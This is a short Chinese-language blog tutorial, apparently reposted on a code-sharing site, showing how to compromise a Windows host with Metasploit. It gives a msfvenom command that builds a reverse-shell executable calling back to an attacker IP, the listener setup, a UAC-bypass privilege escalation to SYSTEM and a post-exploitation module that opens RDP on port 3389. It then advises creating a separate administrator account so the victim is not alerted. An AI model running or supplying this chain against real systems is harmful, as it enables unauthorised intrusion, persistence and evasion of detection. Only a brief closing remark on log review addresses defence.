msf开启3389端口


msf开启提权及开启3389端口

背景:

在我们获取windows服务器反弹shell后,是命令行,如何开启远程界面呢?

以下做一下演示:

流程:

1.生成shell木马

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.142.128 lport=4444 -f exe>shell.exe 

2.设置监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > exploit 

3.getuid 是普通用户权限 尝试getsystem 失败,利用uac提权

use exploit/windows/local/bypassuac

set session 2

exploit
上线后
getuid
getsystem 提权成功

 

 4.执行 post/windows/manage/enable_tcp 开启3389端口

run post/windows/manage/enable_tcp  #开启3389端口

 

 5.运行mstsc

 

 这里有个注意点就是,你这边远程登录后,另一边的账户会被注销,这样就会被发现,所有还是自己net user 一个管理员组用户进行远程连接

 

 简单的日志排查

当然你也可以在你的控制面板-系统安全-管理工具-查看时间日志 进行查看日志排查:发现远程ip登录过这个主机

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM